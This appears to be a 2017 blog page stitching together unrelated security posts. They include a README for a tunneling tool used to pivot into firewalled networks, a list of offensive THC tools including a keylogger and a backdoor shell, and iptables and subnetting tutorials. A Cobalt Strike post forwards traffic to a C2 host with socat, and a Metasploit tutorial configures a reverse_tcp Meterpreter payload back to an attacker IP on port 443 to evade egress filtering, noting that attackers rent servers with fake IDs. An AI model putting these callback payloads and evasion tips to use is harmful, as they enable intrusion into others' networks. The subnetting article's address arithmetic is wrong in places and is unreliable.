Sunday, May 28, 2017

THC-Grenzgaenger 0.3 - Grenzgaenger is a Socks-like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks. THC-Grenzgaenger tool is in ALPHA state! Please don't use it for anything illegal

Grenzgaenger is a Socks-like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks. THC-Grenzgaenger tool is in ALPHA state! Please don't use it for anything illegal. Just play around with it, and it would be nice if you would give me feedback.

Imagine the following: you are here; in front of you is a firewall allowing only port 443; behind it is a DMZ server on which you were able to put a tool, next to many more DMZ servers. (The README draws this as an ASCII diagram: you -> firewall, port 443 only -> the DMZ server you reached -> the other DMZ servers.)

And you would like to do reconnaissance on that DMZ, as you have been able to get onto at least one server there. Interactive login may be a no-go, as it might be a Win95 machine, a chrooted environment on Linux, or some weird old HP-UX 9.0 machine where all the cool tools don't compile. This is where Grenzgaenger comes into play. It allows you to use many tools on your local console, as if you had your laptop hooked up to the DMZ.

I currently just verified that the stuff is working on my SuSE Linux 8.1. Your experience may vary.

How to use it:

1. Run the first tunnel proxy server on your own machine: ./ggd
2. Do the same on the target machine. Use the -p option to choose a different listening port than 443.
3. Edit the gg shell script and change the GG_TUNNEL="127.0.0.1:444:test" value to point to the target machine, e.g. GG_TUNNEL="192.168.13.3:443:test"
4. In the session where you want to use the proxy, just do: gg command options, e.g. gg netcat 192.168.13.3 23.

Latest software from The Hackers Choice

  • THC-pptp-bruter 0.1.4 - THC-pptp-bruter is a brute force program against PPTP VPN endpoints (TCP port 1723). Tested against Windows and Cisco gateways. Exploits a weakness in Microsoft's anti-brute-force implementation which makes it possible to try 300 passwords per second.
  • THC-ManipulateData 1.3 - THC-ManipulateData can search data on a harddisk/partition/file, extract the part you are interested in, and write it back after you modified it. Useful to find and modify really all unencrypted Logfiles on a system.
  • THC-Flood Connect 1.5 - THC-Flood Connect is a connection flooding tool which supports SSL, dumping + sending data, closing or keeping sessions etc. Just a small release. Have fun. Use allowed only for legal purposes.
  • THC-Rut 1.2.5 - THC-Rut is your first knife on a foreign network. It gathers information from local and remote networks.
  • THC-RWWWShell 2.0 - THC-RWWWShell is a proof-of-concept Perl program for the paper "Placing Backdoors through Firewalls". It allows communicating with a shell through firewalls and proxy servers by imitating web traffic.

THC-Grenzgaenger Related Downloads

  • THC-Shagg 0.2.0 - THC-Shagg is a modular application to bruteforce check digit algorithms. THC-Shagg project can be used to gain information about serial numbers that use check digit algorithms.
  • THC-FuzzyFingerprint 0.0.8 - Welcome to the world of Fuzzy Fingerprinting, a new technique to attack cryptographic key authentication protocols that rely on human verification of key fingerprints.
  • THC-SecureDelete 3.1 - THC-SecureDelete is the best secure data deletion toolkit! If you overwrite a file for 10+ times, it can still be recovered. Read why and use the programs included (w/src!). These tools can wipe files, free disk space, swap and memory!
  • THC-Yaotp 0.1 - THC-Yaotp (Yet Another One-Time Pad) is a tool that implements so-called one-time pads and that is useful only to the totally paranoid geek.
  • THC-Amap 5.2 - THC-Amap is a next-generation tool for assisting network penetration testing. It performs fast and reliable application protocol detection, independent of the TCP/UDP port it is bound to.
  • THC-vlogger 2.1.1 - THC-vlogger is an advanced linux kernel based keylogger, enables the capability to log keystrokes of all administrator/users sessions via console, serial and remote sessions (telnet, ssh), switching logging mode by using magic password, stealthily se
  • THC-Probe 4.1 - THC-Probe is the ultimate host scanner compilation for Linux, featuring nmap, snmpscan, netbios auditing tool and super-cool vh shell script. INSTALL: just run "make install".
  • DOWNLOAD : http://www.downloadcollection.com/thc-grenzgaenger.htm

How to Log Linux IPTables Firewall Dropped Packets to a Log File

Log All Dropped Input Packets

First we need to understand how to log all the dropped input packets of iptables to syslog.
If you already have a whole bunch of iptables firewall rules, add these at the bottom; they will log all the dropped input (incoming) packets to /var/log/messages:
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP
In the above example, it does the following:
  • iptables -N LOGGING: Create a new chain called LOGGING
  • iptables -A INPUT -j LOGGING: All the remaining incoming packets will jump to the LOGGING chain
  • iptables -A LOGGING -m limit --limit 2/min -j LOG ...: Log the incoming packets to syslog (/var/log/messages). This third line is explained below in detail.
  • iptables -A LOGGING -j DROP: Finally, drop all the packets that came to the LOGGING chain, i.e. now it really drops the incoming packets.
The third line above (the LOG rule) has the following options for logging the dropped packets:
  • -m limit: This uses the limit matching module. Using this you can limit the logging with the --limit option.
  • --limit 2/min: This indicates the maximum average matching rate for logging. In this example it will limit logging of matching packets to 2 per minute. You can also specify 2/second, 2/minute, 2/hour, 2/day. This is helpful when you don't want to clutter your log messages with repeated messages about the same dropped packets.
  • -j LOG: This indicates that the target for this packet is LOG, i.e. write to the log file.
  • --log-prefix "IPTables-Dropped: ": You can specify any log prefix, which will be prepended to the log messages written to the /var/log/messages file.
  • --log-level 4: This is the standard syslog level. 4 is warning. You can use a number from 0 through 7; 0 is emergency and 7 is debug.

Log All Dropped Outgoing Packets

This is same as above, but the 2nd line below has OUTPUT instead of INPUT.
iptables -N LOGGING
iptables -A OUTPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP

Log All Dropped Packets (both Incoming and Outgoing)

This is the same as before, but we'll take line 2 from each of the previous two examples and add both here, i.e. we'll have a separate line for INPUT and for OUTPUT, each of which jumps to the LOGGING chain.
To log both the incoming and outgoing dropped packets, add the following lines at the bottom of your existing iptables firewall rules.
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A OUTPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
iptables -A LOGGING -j DROP
Also, as explained earlier, by default iptables logs all messages to /var/log/messages. If you want to change this to your own custom log file, add the following line to /etc/syslog.conf:
kern.warning   /var/log/custom.log
How to read the IPTables Log
The following is a sample of the lines that were logged to /var/log/messages when an outgoing and an incoming packet were dropped.
Aug  4 13:22:40 centos kernel: IPTables-Dropped: IN= OUT=em1 SRC=192.168.1.23 DST=192.168.1.20 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=59228 SEQ=2
Aug  4 13:23:00 centos kernel: IPTables-Dropped: IN=em1 OUT= MAC=a2:be:d2:ab:11:af:e2:f2:00:00 SRC=192.168.2.115 DST=192.168.1.23 LEN=52 TOS=0x00 PREC=0x00 TTL=127 ID=9434 DF PROTO=TCP SPT=58428 DPT=443 WINDOW=8192 RES=0x00 SYN URGP=0
In the above output:
  • IPTables-Dropped: This is the prefix that we used in our logging by specifying the --log-prefix option
  • IN=em1: This indicates the interface that was used for this incoming packet. This will be empty for outgoing packets.
  • OUT=em1: This indicates the interface that was used for the outgoing packet. This will be empty for incoming packets.
  • SRC=: The source IP address from where the packet originated
  • DST=: The destination IP address where the packet was sent to
  • LEN=: Length of the packet
  • PROTO=: Indicates the protocol (as you see above, the 1st line is for the outgoing ICMP protocol, the 2nd line is for the incoming TCP protocol)
  • SPT=: Indicates the source port
  • DPT=: Indicates the destination port. In the 2nd line above, the destination port is 443. This indicates that an incoming HTTPS packet was dropped.
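To turn these log lines into something a defender can act on, here is an added example (not from the article) that parses the KEY=VALUE fields the LOG target writes, classifies each drop by direction, protocol and destination port, and collects the sources whose inbound SYNs were dropped. The two firewall lines are the article's own sample output; the third line is a constructed unrelated syslog entry. Because the rule above uses -m limit --limit 2/min, the counts are a lower bound, not a packet count.

```python
# Added example (not from the article): parse the "IPTables-Dropped: " lines
# that the LOG rule writes to /var/log/messages and summarise them.
from collections import Counter

# Two lines are the article's sample output; the sshd line is constructed to
# show that unrelated syslog entries are skipped.
SAMPLE_LOG = """\
Aug  4 13:22:40 centos kernel: IPTables-Dropped: IN= OUT=em1 SRC=192.168.1.23 DST=192.168.1.20 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=59228 SEQ=2
Aug  4 13:23:00 centos kernel: IPTables-Dropped: IN=em1 OUT= MAC=a2:be:d2:ab:11:af:e2:f2:00:00 SRC=192.168.2.115 DST=192.168.1.23 LEN=52 TOS=0x00 PREC=0x00 TTL=127 ID=9434 DF PROTO=TCP SPT=58428 DPT=443 WINDOW=8192 RES=0x00 SYN URGP=0
Aug  4 13:23:01 centos sshd[1234]: Accepted publickey for alice from 192.168.1.5 port 51234 ssh2
"""

PREFIX = "IPTables-Dropped: "   # must match the --log-prefix used in the rule


def parse_dropped(line):
    """Return the netfilter fields of one log line as a dict, or None when the
    line does not carry our prefix.  KEY=VALUE tokens become dict entries;
    bare tokens such as DF or SYN are collected in the 'flags' set."""
    idx = line.find(PREFIX)
    if idx < 0:
        return None
    fields = {"flags": set()}
    for tok in line[idx + len(PREFIX):].split():
        key, sep, val = tok.partition("=")
        if sep:
            # ICMP lines carry ID= twice (IP header id, then echo id): keep the first.
            fields.setdefault(key, val)
        else:
            fields["flags"].add(tok)
    # IN= is empty for packets this host sent, OUT= for packets it received.
    fields["direction"] = "in" if fields.get("IN") else "out"
    return fields


def summarize(log_text):
    """Count drops per (direction, protocol, destination port) and collect the
    sources whose inbound TCP SYNs were dropped.  With -m limit --limit 2/min
    in the rule, these counts undercount a real flood."""
    counts = Counter()
    syn_sources = set()
    for line in log_text.splitlines():
        f = parse_dropped(line)
        if f is None:
            continue
        counts[(f["direction"], f.get("PROTO", "?"), f.get("DPT", "-"))] += 1
        if f["direction"] == "in" and f.get("PROTO") == "TCP" and "SYN" in f["flags"]:
            syn_sources.add(f["SRC"])
    return counts, syn_sources


if __name__ == "__main__":
    counts, syn_sources = summarize(SAMPLE_LOG)
    for (direction, proto, dport), n in sorted(counts.items()):
        print(f"{direction:3} {proto:4} dport={dport:5} dropped={n}")
    print("inbound SYN sources:", ", ".join(sorted(syn_sources)))
```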

Retrieving Encrypted Pre-Shared Keys from a Cisco ASA Configuration

Have you ever forgotten to document the ASA pre-shared keys for a VPN or VPN client connection? Do you need to see the unencrypted password? Try a show run on your Cisco ASA and you will likely find that all of your IKE pre-shared keys show up as *****. Fortunately, for me anyway, the one who tends to be slack on documenting, there is a method to retrieve those keys.

The command:

 more system:running-config

See the difference in the results of "show run" and "more system:running-config". Note that I filtered the output to only include the items of interest here.
ciscoasa# sh run | inc shared
 ikev1 pre-shared-key *****
 ikev1 pre-shared-key *****
ciscoasa# more system:running-config | inc shared
 ikev1 pre-shared-key 1!&rGU2Ptu
 ikev1 pre-shared-key con!@#@Dmin

Saturday, May 27, 2017

Subnetting: The ANDing Process

Introduction


As you would learn in basic TCP/IP, when a host connects to another
host, it has to determine whether the connection is local or remote
(on the same subnet or on a different subnet). When connections are
local, the two hosts usually connect directly to one another to
communicate. When they are not, however, they have to connect to a
router, which forwards the packets along a path that eventually reaches
the packets' final destination: the remote host.

Well, in order to do this (that is, to determine whether the
connection is local or remote), the host executes a simple
mathematical function called an AND function. Even though this all
takes place automatically, it's important to understand it, in order to
understand how IP-based systems know whether to send packets to a host
or to a router.

The Operation Itself


The AND function (or operation) is pretty simple: two binary digits are
compared, and based on their combination a result is produced. It's
not addition, multiplication, subtraction, division, etc. I mean,
there are only 3 outcomes possible when ANDing two binary digits.

CODE : 
0 AND 0 = 0
0 AND 1 = 0
1 AND 1 = 1


Basically unless the two digits are both 1, the result is 0.

But...how is this used in determining whether or not a host is local or 
remote, you ask? I'm getting to that.

Using the ANDing Process to Determine the Location of a Host


It's really not too complicated. Basically, the host takes its own IP 
address and ANDs it with its own subnet mask. Next, it takes the 
destination IP and ANDs it with its own subnet mask. Then, it compares 
these two numbers. If both results of the ANDing are identical, then 
the hosts reside on the same subnet, and it is a local connection. If 
they aren't, the destination host is remote, and they don't reside on 
the same subnet.

Pretty simple, huh? Well, just to be sure you got the hang of it, let's 
go over an example.

Host 1's IP is 192.168.1.3 (a class C IP address, if you remember my
previous articles), with a subnet mask of 255.255.255.0.
Host 2's IP is 192.168.1.7, which is also class C, and has a subnet mask 
of 255.255.255.0.

Well, to find out if the connection is local or remote, Host 1 starts 
the ANDing process.

CODE : 
Host 1's IP in binary (you should remember how to do this from my
previous article):
11000000 10101000 00000001 00000011

Host 2's IP in binary:
11000000 10101000 00000001 00000111

Subnet mask in binary:
11111111 11111111 11111111 00000000

ANDing process for Host 1:
11000000 10101000 00000001 00000011 AND
11111111 11111111 11111111 00000000 =
11000000 10101000 00000001 00000000 (result)

ANDing process for Host 2:
11000000 10101000 00000001 00000111 AND
11111111 11111111 11111111 00000000 =
11000000 10101000 00000001 00000000 (result)

Comparing the results against one another:
Host 1: 11000000 10101000 00000001 00000000
Host 2: 11000000 10101000 00000001 00000000


As you can see, they're the same, meaning they're on the same subnet, and are 
locally connected to one another.

Now, there are two different ways to write an IP address with its subnet mask.
For one, you have a host's class A/B IP and subnet mask; for two, you have its
class C IP and subnet mask (but shown in bits). For example, 49.22.2.3
255.0.0.0 (class A IP and subnet mask), or 192.168.1.3/24 (class C IP and
subnet mask shown in bits: 255 in binary is 11111111, or 8 bits, and 8 bits
times 3 octets = 24).

More on Subnets


Oftentimes it is fairly useful to divide a network into smaller networks.
Reasons for this are outlined in my previous article, but to recap: to prevent 
the wasting of IPs, to make it difficult to map the internal structure of a 
network, etc. Well, here's how it's done.

Let's say we want to divide a class B IP into 8 subnets. As you should know at 
this point, the class B subnet mask is 255.255.0.0. Well, to do this, we need 
to use something called the borrowing process (maybe covered in a later 
article) to create the 8 subnets. Since we need 8, we need 8 different 
combinations + 1 more (the broadcast (also maybe covered later)), so 9 in 
total.

The binary equivalent of 9 is 1001, which is 4 bits long.

CODE : 
Subnet mask:
11111111 11111111 00000000 00000000
Putting 4 bits into the third group (or the first octet of the host part of the
IP (read earlier articles!!!)):
11111111 11111111 11110000 00000000 (240 in base 10)


So our new subnet mask would be...? You might have guessed it, 255.255.240.0.

A simple calculation to determine the number of subnets is 2^x-2 (as stated in
a previous article, once again! :P), where x is the number of bits borrowed for
the subnet mask (4 in the above example).

The calculation for the subnet addresses (finally, something new, eh?) is 256-s,
where s is the value of the borrowed subnet mask octet; above, this value was 240.

The calculation for the hosts number is 2^y-2, where y is the number of 
remaining bits. In our example, this was 12, because:

CODE : 
11111111 11111111 11110000 00000000
                  ----               bits inserted (4)
                      ---- --------  bits left (12)


The IP address numbers are between the IP of the first subnet and the IP of the
last subnet, with the exclusion of the broadcast and network IPs. Broadcast IPs
have all the bits of the host portion set to one (255s), and network IPs have
all the bits of the host portion set to 0 (0s).

Let's sum this up with one last example.

Let's divide a class C IP address into two subnets. We'll use 192.168.1.3 
again. As you already know, you need 2 subnets +1 for broadcasting, so 3 
total. In binary, 3 is 11, or two bits. The class C subnet mask (as you 
should know by now) is 255.255.255.0. After the borrowing process, its last 
group becomes 11000000, or 192 in base 10. So the new subnet mask is 
255.255.255.192.

Number of hosts: 2^6-2=62 (y is 6 in this case)
Subnet addresses: 256-192=64 (s is 192)...so it starts with 192.168.1.67 then 
goes to 192.168.1.131...it starts with 64 and keeps adding 64.
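As an added example (not part of the hackthissite article), the ANDing test and the subnet arithmetic above carried out with explicit 32-bit operations, using the article's own addresses: the two /24 hosts, and the same class C split with 255.255.255.192. It goes one step beyond the text by listing every subnet the new mask carves out, with its network, usable range and broadcast address; the article's 2^x-2 figure is that list minus the first and last subnet.

```python
# Added example (not from the article): ANDing and subnet arithmetic done by hand.

def to_int(dotted):
    """Pack a dotted-quad string into a 32-bit integer (four octets in binary)."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: " + dotted)
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def to_dotted(n):
    """Inverse of to_int."""
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def to_bits(n):
    """Render in the 'xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx' layout the article uses."""
    return " ".join(format((n >> s) & 0xFF, "08b") for s in (24, 16, 8, 0))


def network_of(ip, mask):
    """The ANDing step: IP AND mask yields the network (subnet) address."""
    return to_dotted(to_int(ip) & to_int(mask))


def same_subnet(ip1, ip2, mask):
    """Local if both addresses AND to the same network; otherwise the packet
    has to go to the router."""
    return network_of(ip1, mask) == network_of(ip2, mask)


def subnet_info(mask):
    """Prefix length (the /24 notation), subnet increment (the article's 256-s on
    the borrowed octet, generalised to the whole address) and usable hosts 2^y-2."""
    m = to_int(mask)
    prefix = bin(m).count("1")
    # A valid mask is a run of ones followed by a run of zeros.
    if m != (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF:
        raise ValueError("non-contiguous mask: " + mask)
    host_bits = 32 - prefix
    return {"prefix": prefix, "block_size": 1 << host_bits,
            "usable_hosts": (1 << host_bits) - 2}


def list_subnets(parent_net, parent_mask, new_mask):
    """Every subnet the new mask carves out of the parent block, as
    (network, first usable, last usable, broadcast).  All 2^x subnets are
    listed; the article's 2^x-2 count drops the first and last of them."""
    pm = to_int(parent_mask)
    start = to_int(parent_net) & pm
    end = start | (~pm & 0xFFFFFFFF)
    size = subnet_info(new_mask)["block_size"]
    if size > end - start + 1:
        raise ValueError("new mask is shorter than the parent mask")
    return [(to_dotted(n), to_dotted(n + 1), to_dotted(n + size - 2),
             to_dotted(n + size - 1)) for n in range(start, end + 1, size)]


if __name__ == "__main__":
    # The article's values: two hosts on 192.168.1.0 with a /24 mask ...
    for host in ("192.168.1.3", "192.168.1.7"):
        print(to_bits(to_int(host)), "AND", to_bits(to_int("255.255.255.0")),
              "=", to_bits(to_int(network_of(host, "255.255.255.0"))))
    print("local:", same_subnet("192.168.1.3", "192.168.1.7", "255.255.255.0"))
    # ... and the same class C split with 255.255.255.192.
    print(subnet_info("255.255.255.192"))
    for row in list_subnets("192.168.1.0", "255.255.255.0", "255.255.255.192"):
        print(row)
```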

That's about all I can cover in the scope of this particular article. As 
always, look out for articles from me in the future.

https://www.hackthissite.org/articles/read/902

Cloud-based Redirectors for Distributed Hacking

January 14, 2014
A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn't use one system to launch attacks and catch shells from. Rather, they register many domains and set up several systems to act as redirectors (pivot points) back to their command and control server.
[image: redirectors_t2]
As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn't need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don't need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.
Here’s the socat command to forward connections to port 80 to 54.197.3.16:
socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80
The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directive tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.
Redirectors are great, but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked, the ideal payload would use other redirectors to continue to communicate.
Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:
[image: beacon_redirector]
You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:
[image: beacon_hosts_redirector]
The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.
[image: meterp_redirector]
Now one Cobalt Strike instance has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convenience of managing all of this on one team server though.
If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

Level : Medium, Advanced
A few days ago someone put a message in the contact form on this website, asking "is it possible to do hacking outside a LAN (Local Area Network)?". If you look at all of my articles, 80% of the hacking articles were written for a Local Area Network, because I'm working in my own lab, so "how about hacking outside a Local Area Network?". Of course it has the same logic as when you attack from a Local Area Network 🙂 .

Requirement :

1. Virtual Private Server. For a VPS with Backtrack 5 already installed you can view here (but you can also install it yourself)
2. Dedicated Server
3. Cloud Server (I haven't tried this 🙂 ) e.g. Amazon
4. Internet with a public IP
5. You can control the router yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay, let's start from the Virtual Private Server (VPS). This server gives you the freedom to install any software you want on the virtual machine, because this hosting type gives you the flexibility to manage your server yourself (DIY) 🙂
2. A Dedicated Server does almost the same as a VPS (Virtual Private Server), but usually you have your own machine which you put in a data center (or the service provider rents you their machine). This hosting type also allows you as a user to manage your system yourself. You can do anything to your server and install anything you want on it.
3. Cloud server –> I haven't tried this… maybe someone can share 🙂
4. You have internet with a public IP address… usually when you subscribe to 1:1 internet bandwidth, they also give you 1 public IP.
5. Control the router yourself to redirect incoming or outgoing connections.

Before we continue to the next step, let's look at the figure below (I'll try to draw it in a simple way):
[image: Hacking WAN not LAN]
Information (Attacker):
– Attacker1 uses local IP address –> 192.168.8.8
– Attacker1 has public IP address –> 73.67.123.85
– Attacker1 can control his router to redirect any incoming/outgoing traffic.
– Attacker2 uses a VPS/Dedicated/Cloud server, connected directly to the internet, to do an attack.
Information (Victim):
– Victim1 has local IP address –> 192.168.1.2
– Victim1 is connected to the internet via a router+firewall; this firewall only allows ports 80 and 443 for outgoing connections
– Victim2 is connected directly to the internet with IP address –> 98.87.112.89

How to Attack? :

Actually, for the network topology I drew above the attack method is almost the same; you should know the typical rules an administrator sets up on a firewall (in this case the network administrator who administers the router for victim1). AFAIK they usually open specific ports like:

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc. (you can scan it first, but be careful).
From the information above, the attacker can usually create a payload with options like this:
set payload windows/meterpreter/reverse_tcp
set lhost 73.67.123.85
set lport 443
When the attack is successfully launched, the payload will try to connect to IP address 73.67.123.85 on port 443. The attacker uses port 443 because he knows that the victim1 firewall only allows ports 80 and 443 for outgoing connections. If you configure the payload with another port, the victim1 firewall will drop all packets that try to go through any port except 80 and 443. For the next step, the attacker should configure his router to redirect all incoming traffic on port 443 to his local IP address 192.168.8.8.
You can see a tutorial with an example of port forwarding on a WRT54G router here. Actually all routers have the same option for port forwarding 🙂

Update :

If you use a Windows machine as a router, you can read the port forwarding tutorial here (How to do port forwarding in Windows)
Oops… I almost forgot to explain how to do that from a VPS/Dedicated/Cloud server….
Actually from a VPS/Dedicated/Cloud server it is easier and also safer (maybe.. LoL), because a lot of hackers use these services… they buy them using a fake ID (hit and run) and then perform the attack from that server. The logic is almost the same as what I've already explained above.
You should remember that every action triggers consequences, whether good or bad. When you do something you should know every consequence you will face later for that action. Be wise 🙂
Hope you found it useful.
If the information I wrote here is wrong, let me know and I'll correct it 🙂
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/